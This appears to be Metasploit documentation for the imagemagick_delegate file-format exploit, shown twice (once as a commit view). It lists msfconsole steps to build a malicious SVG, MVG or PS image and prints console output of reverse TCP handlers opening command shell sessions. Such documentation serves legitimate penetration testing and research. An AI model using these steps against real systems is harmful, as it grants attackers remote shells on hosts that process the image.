documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md

## Vulnerable Application

  ImageMagick

## Verification Steps

  Example steps in this format:

  1. Install the ImageMagick
  2. Start msfconsole
  3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
  4. Do: ```run```
  5. convert msf.png msf.jpg

## Options

  **USE_POPEN**

  When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
  When the option is set to `false`, target 2 (PS file) is valid

## Scenarios

## popen=true
  ```
  msf exploit(imagemagick_delegate) > set target 0
  msf exploit(imagemagick_delegate) > run

  [*] Started reverse TCP handler on 1.1.1.1:4444
  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
  [*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
  ```

  ```
  msf exploit(imagemagick_delegate) > set target 1
  msf exploit(imagemagick_delegate) > run

  [*] Started reverse TCP handler on 10.6.0.186:4444
  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
  [*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
  ```

## popen=false
  ```
  msf exploit(imagemagick_delegate) > set target 2
  target => 2
  msf exploit(imagemagick_delegate) > set USE_POPEN false
  USE_POPEN => false
  msf exploit(imagemagick_delegate) > run

  [*] Started reverse TCP handler on 1.1.1.1:4444
  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
  [*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500
  ```
Add module docs for imagemagick_delegate 2016-10-28 17:02:09 -05:00			`## Vulnerable Application`

			`ImageMagick`

			`## Verification Steps`

			`Example steps in this format:`

			`1. Install the ImageMagick`
			`2. Start msfconsole`
			3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
			4. Do: ```run```
			`5. convert msf.png msf.jpg`

			`## Options`

			`USE_POPEN`

			When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
			When the option is set to `false`, target 2 (PS file) is valid

			`## Scenarios`

			`## popen=true`
			```
			`msf exploit(imagemagick_delegate) > set target 0`
			`msf exploit(imagemagick_delegate) > run`

			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png`
			`[*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500`
			```

			```
			`msf exploit(imagemagick_delegate) > set target 1`
			`msf exploit(imagemagick_delegate) > run`

			`[*] Started reverse TCP handler on 10.6.0.186:4444`
			`[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png`
			`[*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500`
			```

			`## popen=false`
			```
			`msf exploit(imagemagick_delegate) > set target 2`
			`target => 2`
			`msf exploit(imagemagick_delegate) > set USE_POPEN false`
			`USE_POPEN => false`
			`msf exploit(imagemagick_delegate) > run`

			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png`
			`[*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500`
			```